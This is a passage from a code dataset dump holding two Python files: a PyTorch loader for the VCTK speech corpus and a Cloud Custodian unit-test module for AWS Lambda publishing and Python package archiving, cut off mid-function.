content stringlengths 5 1.05M |
|---|
import json
import torch
import pandas as pd
from os.path import join
from torch.utils.data import Dataset
class VCTKDataset(Dataset):
def __init__(self, path, partition_table, split, bucketing, batch_size, spkr_map):
"""
Arg:
split: one in ['train', 'dev', 'test']
path: root directory of VCTK (i.e. /yourPath/VCTK-Corpus)
bucket_size: bucket size for bucketing
"""
# Setup
self.path = path
self.split = split
self.batch_size = batch_size
self.bucketing = bucketing and (split not in ['dev','test'])
self.bs_for_collate = 1 if self.bucketing else self.batch_size
self.spkr_map = json.load(open(spkr_map))
# Select split and sort lenght
table = pd.read_csv(partition_table, index_col=0)
table = table[table.split == split]
if len(table)==0:
# Empty partition
self.table = table.append({'speaker':0,'split':split,'duration':0}, ignore_index=True)
else:
table['file_path'] = table.apply(lambda row: join(path, row.speaker, row.name+'.wav'), axis=1)
table['speaker'] = table.apply(lambda row: self.spkr_map[row.speaker], axis=1)
table = table.sort_values('duration', axis=0, ascending=False)
self.table = table if split != 'test' else table[table.speaker != self.spkr_map['lj']]
self.n_spkr = len(spkr_map)
def get_statics(self):
return ' | {} size = {}\t| Duration = {:.1f}\t| Bucketing = {} '\
.format(self.split.replace('unpaired','unpair'), len(self.table), self.table.duration.sum()/60, self.bucketing)
def __getitem__(self,index):
if self.bucketing:
# Return a bucket
index = min(len(self.table)-self.batch_size,index)
wav_list = self.table.iloc[index:index+self.batch_size].file_path.tolist()
spkr_list = self.table.iloc[index:index+self.batch_size].speaker.tolist()
return list(zip(wav_list, spkr_list))
else:
return self.table.iloc[index].file_path, self.table.iloc[index].speaker
def __len__(self):
return len(self.table)
|
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, timedelta
import importlib
import json
import logging
import os
import platform
import py_compile
import shutil
import site
import sys
import tempfile
import time
import unittest
import zipfile
import mock
from c7n.mu import (
custodian_archive,
generate_requirements,
LambdaFunction,
LambdaManager,
PolicyLambda,
PythonPackageArchive,
CloudWatchLogSubscription,
SNSSubscription,
SQSSubscription,
CloudWatchEventSource
)
from c7n.ufuncs import logsub
from .common import (
BaseTest, event_data, functional, Bag, ACCOUNT_ID)
from .data import helloworld
ROLE = "arn:aws:iam::644160558196:role/custodian-mu"
def test_generate_requirements():
lines = generate_requirements(
'boto3', ignore=('docutils', 's3transfer', 'six'))
packages = []
for l in lines.split('\n'):
pkg_name, version = l.split('==')
packages.append(pkg_name)
assert set(packages) == set([
'botocore', 'jmespath', 'urllib3', 'python-dateutil'])
class Publish(BaseTest):
def make_func(self, **kw):
func_data = dict(
name="test-foo-bar",
handler="index.handler",
memory_size=128,
timeout=3,
role='custodian-mu',
runtime="python2.7",
description="test",
)
func_data.update(kw)
archive = PythonPackageArchive()
archive.add_contents(
"index.py", """def handler(*a, **kw):\n print("Greetings, program!")"""
)
archive.close()
self.addCleanup(archive.remove)
return LambdaFunction(func_data, archive)
def test_publishes_a_lambda(self):
session_factory = self.replay_flight_data("test_publishes_a_lambda")
mgr = LambdaManager(session_factory)
func = self.make_func()
self.addCleanup(mgr.remove, func)
result = mgr.publish(func)
self.assertEqual(result["CodeSize"], 169)
def test_publish_a_lambda_with_layer_and_concurrency(self):
factory = self.replay_flight_data('test_lambda_layer_concurrent_publish')
mgr = LambdaManager(factory)
layers = ['arn:aws:lambda:us-east-1:644160558196:layer:CustodianLayer:2']
func = self.make_func(
concurrency=5,
layers=layers)
self.addCleanup(mgr.remove, func)
result = mgr.publish(func)
self.assertEqual(result['Layers'][0]['Arn'], layers[0])
state = mgr.get(func.name)
self.assertEqual(state['Concurrency']['ReservedConcurrentExecutions'], 5)
func = self.make_func(layers=layers)
output = self.capture_logging("custodian.serverless", level=logging.DEBUG)
result = mgr.publish(func)
self.assertEqual(result['Layers'][0]['Arn'], layers[0])
lines = output.getvalue().strip().split("\n")
self.assertFalse('Updating function: test-foo-bar config Layers' in lines)
self.assertTrue('Removing function: test-foo-bar concurrency' in lines)
def test_can_switch_runtimes(self):
session_factory = self.replay_flight_data("test_can_switch_runtimes")
func = self.make_func()
mgr = LambdaManager(session_factory)
self.addCleanup(mgr.remove, func)
result = mgr.publish(func)
self.assertEqual(result["Runtime"], "python2.7")
func.func_data["runtime"] = "python3.6"
result = mgr.publish(func)
self.assertEqual(result["Runtime"], "python3.6")
class PolicyLambdaProvision(BaseTest):
role = "arn:aws:iam::644160558196:role/custodian-mu"
def assert_items(self, result, expected):
for k, v in expected.items():
self.assertEqual(v, result[k])
def test_config_rule_provision(self):
session_factory = self.replay_flight_data("test_config_rule")
p = self.load_policy(
{
"resource": "security-group",
"name": "sg-modified",
"mode": {"type": "config-rule"},
},
session_factory=session_factory
)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
result = mgr.publish(pl, "Dev", role=ROLE)
self.assertEqual(result["FunctionName"], "custodian-sg-modified")
self.addCleanup(mgr.remove, pl)
def test_config_rule_evaluation(self):
session_factory = self.replay_flight_data("test_config_rule_evaluate")
p = self.load_policy(
{
"resource": "ec2",
"name": "ec2-modified",
"mode": {"type": "config-rule"},
"filters": [{"InstanceId": "i-094bc87c84d56c589"}],
},
session_factory=session_factory,
)
mode = p.get_execution_mode()
event = event_data("event-config-rule-instance.json")
resources = mode.run(event, None)
self.assertEqual(len(resources), 1)
def test_phd_account_mode(self):
factory = self.replay_flight_data('test_phd_event_mode')
p = self.load_policy(
{'name': 'ec2-retire',
'resource': 'account',
'mode': {
'categories': ['scheduledChange'],
'events': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED'],
'type': 'phd'}}, session_factory=factory)
mode = p.get_execution_mode()
event = event_data('event-phd-ec2-retire.json')
resources = mode.run(event, None)
self.assertEqual(len(resources), 1)
self.assertTrue('c7n:HealthEvent' in resources[0])
def test_phd_mode(self):
factory = self.replay_flight_data('test_phd_event_mode')
p = self.load_policy(
{'name': 'ec2-retire',
'resource': 'ec2',
'mode': {
'categories': ['scheduledChange'],
'events': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED'],
'type': 'phd'}}, session_factory=factory)
mode = p.get_execution_mode()
event = event_data('event-phd-ec2-retire.json')
resources = mode.run(event, None)
self.assertEqual(len(resources), 1)
p_lambda = PolicyLambda(p)
events = p_lambda.get_events(factory)
self.assertEqual(
json.loads(events[0].render_event_pattern()),
{'detail': {
'eventTypeCategory': ['scheduledChange'],
'eventTypeCode': ['AWS_EC2_PERSISTENT_INSTANCE_RETIREMENT_SCHEDULED']},
'source': ['aws.health']}
)
def test_cwl_subscriber(self):
self.patch(CloudWatchLogSubscription, "iam_delay", 0.01)
session_factory = self.replay_flight_data("test_cwl_subscriber")
session = session_factory()
client = session.client("logs")
lname = "custodian-test-log-sub"
self.addCleanup(client.delete_log_group, logGroupName=lname)
client.create_log_group(logGroupName=lname)
linfo = client.describe_log_groups(logGroupNamePrefix=lname)["logGroups"][0]
params = dict(
session_factory=session_factory,
name="c7n-log-sub",
role=ROLE,
sns_topic="arn:",
log_groups=[linfo],
)
func = logsub.get_function(**params)
manager = LambdaManager(session_factory)
finfo = manager.publish(func)
self.addCleanup(manager.remove, func)
results = client.describe_subscription_filters(logGroupName=lname)
self.assertEqual(len(results["subscriptionFilters"]), 1)
self.assertEqual(
results["subscriptionFilters"][0]["destinationArn"], finfo["FunctionArn"]
)
# try and update
# params['sns_topic'] = "arn:123"
# manager.publish(func)
@functional
def test_sqs_subscriber(self):
session_factory = self.replay_flight_data('test_mu_sqs_subscriber')
func_name = 'c7n-hello-sqs'
queue_name = "my-dev-test-3"
# Setup Queues
session = session_factory()
client = session.client('sqs')
queue_url = client.create_queue(QueueName=queue_name).get('QueueUrl')
queue_arn = client.get_queue_attributes(
QueueUrl=queue_url,
AttributeNames=['QueueArn'])['Attributes']['QueueArn']
self.addCleanup(client.delete_queue, QueueUrl=queue_url)
# Setup Function
params = dict(
session_factory=session_factory,
name=func_name,
role="arn:aws:iam::644160558196:role/custodian-mu",
events=[SQSSubscription(session_factory, [queue_arn])])
func = helloworld.get_function(**params)
manager = LambdaManager(session_factory)
manager.publish(func)
self.addCleanup(manager.remove, func)
# Send and Receive Check
client.send_message(
QueueUrl=queue_url, MessageBody=json.dumps({'jurassic': 'block'}))
if self.recording:
time.sleep(60)
log_events = list(manager.logs(func, "1970-1-1 UTC", "2037-1-1"))
messages = [
e["message"] for e in log_events if e["message"].startswith('{"Records')
]
self.addCleanup(
session.client("logs").delete_log_group,
logGroupName="/aws/lambda/%s" % func_name)
self.assertIn(
'jurassic',
json.loads(messages[0])["Records"][0]["body"])
@functional
def test_sns_subscriber_and_ipaddress(self):
self.patch(SNSSubscription, "iam_delay", 0.01)
session_factory = self.replay_flight_data("test_sns_subscriber_and_ipaddress")
session = session_factory()
client = session.client("sns")
# create an sns topic
tname = "custodian-test-sns-sub"
topic_arn = client.create_topic(Name=tname)["TopicArn"]
self.addCleanup(client.delete_topic, TopicArn=topic_arn)
# provision a lambda via mu
params = dict(
session_factory=session_factory,
name="c7n-hello-world",
role="arn:aws:iam::644160558196:role/custodian-mu",
events=[SNSSubscription(session_factory, [topic_arn])],
)
func = helloworld.get_function(**params)
manager = LambdaManager(session_factory)
manager.publish(func)
self.addCleanup(manager.remove, func)
# now publish to the topic and look for lambda log output
client.publish(TopicArn=topic_arn, Message="Greetings, program!")
if self.recording:
time.sleep(30)
log_events = manager.logs(func, "1970-1-1 UTC", "2037-1-1")
messages = [
e["message"] for e in log_events if e["message"].startswith('{"Records')
]
self.addCleanup(
session.client("logs").delete_log_group,
logGroupName="/aws/lambda/c7n-hello-world",
)
self.assertEqual(
json.loads(messages[0])["Records"][0]["Sns"]["Message"],
"Greetings, program!",
)
def test_cwe_update_config_and_code(self):
# Originally this was testing the no update case.. but
# That is tricky to record, any updates to the code end up
# causing issues due to checksum mismatches which imply updating
# the function code / which invalidate the recorded data and
# the focus of the test.
session_factory = self.replay_flight_data("test_cwe_update", zdata=True)
p = self.load_policy({
"resource": "s3",
"name": "s3-bucket-policy",
"mode": {"type": "cloudtrail",
"events": ["CreateBucket"], 'runtime': 'python2.7'},
"filters": [
{"type": "missing-policy-statement",
"statement_ids": ["RequireEncryptedPutObject"]},
],
"actions": ["no-op"],
})
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
result = mgr.publish(pl, "Dev", role=ROLE)
self.addCleanup(mgr.remove, pl)
p = self.load_policy(
{
"resource": "s3",
"name": "s3-bucket-policy",
"mode": {
"type": "cloudtrail",
"memory": 256,
'runtime': 'python2.7',
"events": [
"CreateBucket",
{
"event": "PutBucketPolicy",
"ids": "requestParameters.bucketName",
"source": "s3.amazonaws.com",
},
],
},
"filters": [
{
"type": "missing-policy-statement",
"statement_ids": ["RequireEncryptedPutObject"],
}
],
"actions": ["no-op"],
},
)
output = self.capture_logging("custodian.serverless", level=logging.DEBUG)
result2 = mgr.publish(PolicyLambda(p), "Dev", role=ROLE)
lines = output.getvalue().strip().split("\n")
self.assertTrue("Updating function custodian-s3-bucket-policy code" in lines)
self.assertTrue(
"Updating function: custodian-s3-bucket-policy config MemorySize" in lines)
self.assertEqual(result["FunctionName"], result2["FunctionName"])
# drive by coverage
functions = [
i
for i in mgr.list_functions()
if i["FunctionName"] == "custodian-s3-bucket-policy"
]
self.assertTrue(len(functions), 1)
start = 0
end = time.time() * 1000
self.assertEqual(list(mgr.logs(pl, start, end)), [])
def test_cwe_trail(self):
session_factory = self.replay_flight_data("test_cwe_trail", zdata=True)
p = self.load_policy({
"resource": "s3",
"name": "s3-bucket-policy",
"mode": {"type": "cloudtrail", "events": ["CreateBucket"]},
"filters": [
{
"type": "missing-policy-statement",
"statement_ids": ["RequireEncryptedPutObject"],
}
],
"actions": ["no-op"]},
session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
self.addCleanup(mgr.remove, pl)
result = mgr.publish(pl, "Dev", role=ROLE)
events = pl.get_events(session_factory)
self.assertEqual(len(events), 1)
event = events.pop()
self.assertEqual(
json.loads(event.render_event_pattern()),
{
u"detail": {
u"eventName": [u"CreateBucket"],
u"eventSource": [u"s3.amazonaws.com"],
},
u"detail-type": ["AWS API Call via CloudTrail"],
},
)
self.assert_items(
result,
{
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-s3-bucket-policy",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
},
)
def test_mu_metrics(self):
session_factory = self.replay_flight_data("test_mu_metrics")
p = self.load_policy(
{
"name": "s3-bucket-policy",
"resource": "s3",
"mode": {"type": "cloudtrail", "events": ["CreateBucket"]},
"actions": ["no-op"],
}, session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
end = datetime.utcnow()
start = end - timedelta(1)
results = mgr.metrics([pl], start, end, 3600)
self.assertEqual(
results,
[{"Durations": [], "Errors": [], "Throttles": [], "Invocations": []}],
)
def test_cwe_instance(self):
session_factory = self.replay_flight_data("test_cwe_instance", zdata=True)
p = self.load_policy({
"resource": "s3",
"name": "ec2-encrypted-vol",
"mode": {"type": "ec2-instance-state", "events": ["pending"]}},
session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
self.addCleanup(mgr.remove, pl)
result = mgr.publish(pl, "Dev", role=ROLE)
self.assert_items(
result,
{
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-ec2-encrypted-vol",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
},
)
events = session_factory().client("events")
result = events.list_rules(NamePrefix="custodian-ec2-encrypted-vol")
self.assert_items(
result["Rules"][0],
{"State": "ENABLED", "Name": "custodian-ec2-encrypted-vol"},
)
self.assertEqual(
json.loads(result["Rules"][0]["EventPattern"]),
{
"source": ["aws.ec2"],
"detail": {"state": ["pending"]},
"detail-type": ["EC2 Instance State-change Notification"],
},
)
def test_cwe_asg_instance(self):
session_factory = self.replay_flight_data("test_cwe_asg", zdata=True)
p = self.load_policy(
{
"resource": "asg",
"name": "asg-spin-detector",
"mode": {"type": "asg-instance-state", "events": ["launch-failure"]},
}, session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
self.addCleanup(mgr.remove, pl)
result = mgr.publish(pl, "Dev", role=ROLE)
self.assert_items(
result,
{
"FunctionName": "custodian-asg-spin-detector",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
},
)
events = session_factory().client("events")
result = events.list_rules(NamePrefix="custodian-asg-spin-detector")
self.assert_items(
result["Rules"][0],
{"State": "ENABLED", "Name": "custodian-asg-spin-detector"},
)
self.assertEqual(
json.loads(result["Rules"][0]["EventPattern"]),
{
"source": ["aws.autoscaling"],
"detail-type": ["EC2 Instance Launch Unsuccessful"],
},
)
def test_cwe_security_hub_action(self):
factory = self.replay_flight_data('test_mu_cwe_sechub_action')
p = self.load_policy({
'name': 'sechub',
'resource': 'account',
'mode': {
'type': 'hub-action'}},
session_factory=factory,
config={'account_id': ACCOUNT_ID})
mu_policy = PolicyLambda(p)
events = mu_policy.get_events(factory)
self.assertEqual(len(events), 1)
hub_action = events.pop()
self.assertEqual(
json.loads(hub_action.cwe.render_event_pattern()),
{'resources': [
'arn:aws:securityhub:us-east-1:644160558196:action/custom/sechub'],
'source': ['aws.securityhub'],
'detail-type': [
'Security Hub Findings - Custom Action', 'Security Hub Insight Results'
]})
hub_action.cwe = cwe = mock.Mock(CloudWatchEventSource)
cwe.get.return_value = False
cwe.update.return_value = True
cwe.add.return_value = True
self.assertEqual(repr(hub_action), "<SecurityHub Action sechub>")
self.assertEqual(
hub_action._get_arn(),
"arn:aws:securityhub:us-east-1:644160558196:action/custom/sechub")
self.assertEqual(
hub_action.get(mu_policy.name), {'event': False, 'action': None})
hub_action.add(mu_policy)
self.assertEqual(
{'event': False,
'action': {
'ActionTargetArn': ('arn:aws:securityhub:us-east-1:'
'644160558196:action/custom/sechub'),
'Name': 'Account sechub', 'Description': 'sechub'}},
hub_action.get(mu_policy.name))
hub_action.update(mu_policy)
hub_action.remove(mu_policy)
self.assertEqual(
hub_action.get(mu_policy.name),
{'event': False, 'action': None})
def test_cwe_schedule(self):
session_factory = self.replay_flight_data("test_cwe_schedule", zdata=True)
p = self.load_policy(
{
"resource": "ec2",
"name": "periodic-ec2-checker",
"mode": {"type": "periodic", "schedule": "rate(1 day)"},
}, session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
self.addCleanup(mgr.remove, pl)
result = mgr.publish(pl, "Dev", role=ROLE)
self.assert_items(
result,
{
"FunctionName": "custodian-periodic-ec2-checker",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
},
)
events = session_factory().client("events")
result = events.list_rules(NamePrefix="custodian-periodic-ec2-checker")
self.assert_items(
result["Rules"][0],
{
"State": "ENABLED",
"ScheduleExpression": "rate(1 day)",
"Name": "custodian-periodic-ec2-checker",
},
)
key_arn = "arn:aws:kms:us-west-2:644160558196:key/" "44d25a5c-7efa-44ed-8436-b9511ea921b3"
sns_arn = "arn:aws:sns:us-west-2:644160558196:config-topic"
def create_a_lambda(self, flight, **extra):
session_factory = self.replay_flight_data(flight, zdata=True)
mode = {
"type": "config-rule", "role": "arn:aws:iam::644160558196:role/custodian-mu"
}
mode.update(extra)
p = self.load_policy({
"resource": "s3",
"name": "hello-world",
"actions": ["no-op"],
"mode": mode},
session_factory=session_factory)
pl = PolicyLambda(p)
mgr = LambdaManager(session_factory)
def cleanup():
mgr.remove(pl)
if self.recording:
time.sleep(60)
self.addCleanup(cleanup)
return mgr, mgr.publish(pl)
def create_a_lambda_with_lots_of_config(self, flight):
extra = {
"environment": {"Variables": {"FOO": "bar"}},
"kms_key_arn": self.key_arn,
"dead_letter_config": {"TargetArn": self.sns_arn},
"tracing_config": {"Mode": "Active"},
"tags": {"Foo": "Bar"},
}
return self.create_a_lambda(flight, **extra)
def update_a_lambda(self, mgr, **config):
mode = {
"type": "config-rule", "role": "arn:aws:iam::644160558196:role/custodian-mu"
}
mode.update(config)
p = self.load_policy({
"resource": "s3",
"name": "hello-world",
"actions": ["no-op"],
"mode": mode,
})
pl = PolicyLambda(p)
return mgr.publish(pl)
def test_config_coverage_for_lambda_creation(self):
mgr, result = self.create_a_lambda_with_lots_of_config(
"test_config_coverage_for_lambda_creation"
)
self.assert_items(
result,
{
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-hello-world",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
"DeadLetterConfig": {"TargetArn": self.sns_arn},
"Environment": {"Variables": {"FOO": "bar"}},
"KMSKeyArn": self.key_arn,
"TracingConfig": {"Mode": "Active"},
},
)
tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
self.assert_items(tags, {"Foo": "Bar"})
def test_config_coverage_for_lambda_update_from_plain(self):
mgr, result = self.create_a_lambda(
"test_config_coverage_for_lambda_update_from_plain"
)
result = self.update_a_lambda(
mgr,
**{
"environment": {"Variables": {"FOO": "bloo"}},
"kms_key_arn": self.key_arn,
"dead_letter_config": {"TargetArn": self.sns_arn},
"tracing_config": {"Mode": "Active"},
"tags": {"Foo": "Bloo"},
}
)
self.assert_items(
result,
{
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-hello-world",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python2.7",
"Timeout": 60,
"DeadLetterConfig": {"TargetArn": self.sns_arn},
"Environment": {"Variables": {"FOO": "bloo"}},
"TracingConfig": {"Mode": "Active"},
},
)
tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
self.assert_items(tags, {"Foo": "Bloo"})
def test_config_coverage_for_lambda_update_from_complex(self):
mgr, result = self.create_a_lambda_with_lots_of_config(
"test_config_coverage_for_lambda_update_from_complex"
)
result = self.update_a_lambda(
mgr,
**{
"runtime": "python3.6",
"environment": {"Variables": {"FOO": "baz"}},
"kms_key_arn": "",
"dead_letter_config": {},
"tracing_config": {},
"tags": {"Foo": "Baz", "Bah": "Bug"},
}
)
self.assert_items(
result,
{
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-hello-world",
"Handler": "custodian_policy.run",
"MemorySize": 512,
"Runtime": "python3.6",
"Timeout": 60,
"DeadLetterConfig": {"TargetArn": self.sns_arn},
"Environment": {"Variables": {"FOO": "baz"}},
"TracingConfig": {"Mode": "Active"},
},
)
tags = mgr.client.list_tags(Resource=result["FunctionArn"])["Tags"]
self.assert_items(tags, {"Foo": "Baz", "Bah": "Bug"})
def test_optional_packages(self):
data = {
"name": "s3-lambda-extra",
"resource": "s3",
"mode": {
"type": "cloudtrail",
"packages": ["boto3"],
"events": ["CreateBucket"],
},
}
p = self.load_policy(data)
pl = PolicyLambda(p)
pl.archive.close()
self.assertTrue("boto3/utils.py" in pl.archive.get_filenames())
def test_delta_config_diff(self):
delta = LambdaManager.delta_function
self.assertFalse(
delta(
{
"VpcConfig": {
"SubnetIds": ["s-1", "s-2"],
"SecurityGroupIds": ["sg-1", "sg-2"],
}
},
{
"VpcConfig": {
"SubnetIds": ["s-2", "s-1"],
"SecurityGroupIds": ["sg-2", "sg-1"],
}
},
)
)
self.assertTrue(
delta(
{
"VpcConfig": {
"SubnetIds": ["s-1", "s-2"],
"SecurityGroupIds": ["sg-1", "sg-2"],
}
},
{
"VpcConfig": {
"SubnetIds": ["s-2", "s-1"],
"SecurityGroupIds": ["sg-3", "sg-1"],
}
},
)
)
self.assertFalse(delta({}, {"DeadLetterConfig": {}}))
self.assertTrue(delta({}, {"DeadLetterConfig": {"TargetArn": "arn"}}))
self.assertFalse(delta({}, {"Environment": {"Variables": {}}}))
self.assertTrue(delta({}, {"Environment": {"Variables": {"k": "v"}}}))
self.assertFalse(delta({}, {"KMSKeyArn": ""}))
self.assertFalse(
delta({}, {"VpcConfig": {"SecurityGroupIds": [], "SubnetIds": []}})
)
def test_config_defaults(self):
p = PolicyLambda(Bag({"name": "hello", "data": {"mode": {}}}))
self.maxDiff = None
self.assertEqual(
p.get_config(),
{
"DeadLetterConfig": {},
"Description": "cloud-custodian lambda policy",
"FunctionName": "custodian-hello",
"Handler": "custodian_policy.run",
"KMSKeyArn": "",
"MemorySize": 512,
"Role": "",
"Runtime": "python3.8",
"Tags": {},
"Timeout": 900,
"TracingConfig": {"Mode": "PassThrough"},
"VpcConfig": {"SecurityGroupIds": [], "SubnetIds": []},
},
)
class PythonArchiveTest(unittest.TestCase):
def make_archive(self, modules=(), cache_file=None):
archive = self.make_open_archive(modules, cache_file=cache_file)
archive.close()
return archive
def make_open_archive(self, modules=(), cache_file=None):
archive = PythonPackageArchive(modules=modules, cache_file=cache_file)
self.addCleanup(archive.remove)
return archive
def get_filenames(self, modules=()):
return self.make_archive(modules).get_filenames()
def test_handles_stdlib_modules(self):
filenames = self.get_filenames(["webbrowser"])
self.assertTrue("webbrowser.py" in filenames)
def test_handles_third_party_modules(self):
filenames = self.get_filenames(["botocore"])
self.assertTrue("botocore/__init__.py" in filenames)
def test_handles_packages(self):
filenames = self.get_filenames(["c7n"])
self.assertTrue("c7n/__init__.py" in filenames)
self.assertTrue("c7n/resources/s3.py" in filenames)
self.assertTrue("c7n/ufuncs/s3crypt.py" in filenames)
def _install_namespace_package(self, tmp_sitedir):
# Install our test namespace package in such a way that both py27 and
# py36 can find it.
from setuptools import namespaces
installer = namespaces.Installer()
class Distribution:
namespace_packages = ["namespace_package"]
installer.distribution = Distribution()
installer.target = os.path.join(tmp_sitedir, "namespace_package.pth")
installer.outputs = []
installer.dry_run = False
installer.install_namespaces()
site.addsitedir(tmp_sitedir, known_paths=site._init_pathinfo())
def test_handles_namespace_packages(self):
bench = tempfile.mkdtemp()
def cleanup():
while bench in sys.path:
sys.path.remove(bench)
shutil.rmtree(bench)
self.addCleanup(cleanup)
subpackage = os.path.join(bench, "namespace_package", "subpackage")
os.makedirs(subpackage)
open(os.path.join(subpackage, "__init__.py"), "w+").write("foo = 42\n")
def _():
from namespace_package.subpackage import foo
assert foo # dodge linter
self.assertRaises(ImportError, _)
self._install_namespace_package(bench)
from namespace_package.subpackage import foo
self.assertEqual(foo, 42)
filenames = self.get_filenames(["namespace_package"])
self.assertTrue("namespace_package/__init__.py" not in filenames)
self.assertTrue("namespace_package/subpackage/__init__.py" in filenames)
self.assertTrue(filenames[-1].endswith("-nspkg.pth"))
def test_excludes_non_py_files(self):
filenames = self.get_filenames(["ctypes"])
self.assertTrue("README.ctypes" not in filenames)
def test_cant_get_bytes_when_open(self):
archive = self.make_open_archive()
self.assertRaises(AssertionError, archive.get_bytes)
def test_cant_add_files_when_closed(self):
archive = self.make_archive()
self.assertRaises(AssertionError, archive.add_file, __file__)
def test_cant_add_contents_when_closed(self):
archive = self.make_archive()
self.assertRaises(AssertionError, archive.add_contents, "foo", "bar")
def test_can_add_additional_files_while_open(self):
archive = self.make_open_archive()
archive.add_file(__file__)
archive.close()
filenames = archive.get_filenames()
self.assertTrue(os.path.basename(__file__) in filenames)
def test_can_set_path_when_adding_files(self):
archive = self.make_open_archive()
archive.add_file(__file__, "cheese/is/yummy.txt")
archive.close()
filenames = archive.get_filenames()
self.assertTrue(os.path.basename(__file__) not in filenames)
self.assertTrue("cheese/is/yummy.txt" in filenames)
def test_can_add_a_file_with_contents_from_a_string(self):
archive = self.make_open_archive()
archive.add_contents("cheese.txt", "So yummy!")
archive.close()
self.assertTrue("cheese.txt" in archive.get_filenames())
with archive.get_reader() as reader:
self.assertEqual(b"So yummy!", reader.read("cheese.txt"))
def test_custodian_archive_creates_a_custodian_archive(self):
archive = custodian_archive()
self.addCleanup(archive.remove)
archive.close()
filenames = archive.get_filenames()
self.assertTrue("c7n/__init__.py" in filenames)
self.assertTrue("pkg_resources/__init__.py" in filenames)
def make_file(self):
bench = tempfile.mkdtemp()
path = os.path.join(bench, "foo.txt")
open(path, "w+").write("Foo.")
self.addCleanup(lambda: shutil.rmtree(bench))
return path
def check_world_readable(self, archive):
world_readable = 0o004 << 16
for info in zipfile.ZipFile(archive.path).filelist:
self.assertEqual(info.external_attr & world_readable, world_readable)
def test_files_are_all_readable(self):
self.check_world_readable(self.make_archive(["c7n"]))
def test_even_unreadable_files_become_readable(self):
path = self.make_file()
os.chmod(path, 0o600)
archive = self.make_open_archive()
archive.add_file(path)
archive.close()
self.check_world_readable(archive)
def test_unless_you_make_your_own_zipinfo(self):
info = zipfile.ZipInfo(self.make_file())
archive = self.make_open_archive()
archive.add_contents(info, "foo.txt")
archive.close()
self.assertRaises(AssertionError, self.check_world_readable, archive)
def test_cache_zip_file(self):
archive = self.make_archive(cache_file=os.path.join(os.path.dirname(__file__),
"data",
"test.zip"))
self.assertTrue("cheese.txt" in archive.get_filenames())
self.assertTrue("cheese/is/yummy.txt" in archive.get_filenames())
with archive.get_reader() as reader:
self.assertEqual(b"So yummy!", reader.read("cheese.txt"))
self.assertEqual(b"True!", reader.read("cheese/is/yummy.txt"))
class PycCase(unittest.TestCase):
def setUp(self):
self.bench = tempfile.mkdtemp()
sys.path.insert(0, self.bench)
def tearDown(self):
sys.path.remove(self.bench)
shutil.rmtree(self.bench)
def py_with_pyc(self, name):
path = os.path.join(self.bench, name)
with open(path, "w+") as fp:
fp.write("42")
py_compile.compile(path)
return path
class Constructor(PycCase):
def test_class_constructor_only_accepts_py_modules_not_pyc(self):
# Create a module with both *.py and *.pyc.
self.py_with_pyc("foo.py")
# Create another with a *.pyc but no *.py behind it.
os.unlink(self.py_with_pyc("bar.py"))
# Now: *.py takes precedence over *.pyc ...
def get(name):
return os.path.basename(importlib.import_module(name).__file__)
self.assertTrue(get("foo"), "foo.py")
try:
# ... and while *.pyc is importable ...
self.assertTrue(get("bar"), "bar.pyc")
except ImportError:
try:
# (except on PyPy)
# http://doc.pypy.org/en/latest/config/objspace.lonepycfiles.html
self.assertEqual(platform.python_implementation(), "PyPy")
except AssertionError:
# (... aaaaaand Python 3)
self.assertEqual(platform.python_version_tuple()[0], "3")
else:
# ... we refuse it.
with self.assertRaises(ValueError) as raised:
PythonPackageArchive(modules=["bar"])
msg = raised.exception.args[0]
self.assertTrue(msg.startswith("Could not find a *.py source file"))
self.assertTrue(msg.endswith("bar.pyc"))
# We readily ignore a *.pyc if a *.py exists.
archive = PythonPackageArchive(modules=["foo"])
archive.close()
self.assertEqual(archive.get_filenames(), ["foo.py"])
with archive.get_reader() as reader:
self.assertEqual(b"42", reader.read("foo.py"))
class AddPyFile(PycCase):
def test_can_add_py_file(self):
archive = PythonPackageArchive()
archive.add_py_file(self.py_with_pyc("foo.py"))
archive.close()
self.assertEqual(archive.get_filenames(), ["foo.py"])
def test_reverts_to_py_if_available(self):
archive = PythonPackageArchive()
py = self.py_with_pyc("foo.py")
archive.add_py_file(py + "c")
archive.close()
self.assertEqual(archive.get_filenames(), ["foo.py"])
def test_fails_if_py_not_available(self):
archive = PythonPackageArchive()
py = self.py_with_pyc("foo.py")
os.unlink(py)
self.assertRaises(IOError, archive.add_py_file, py + "c")
class DiffTags(unittest.TestCase):
def test_empty(self):
assert LambdaManager.diff_tags({}, {}) == ({}, [])
def test_removal(self):
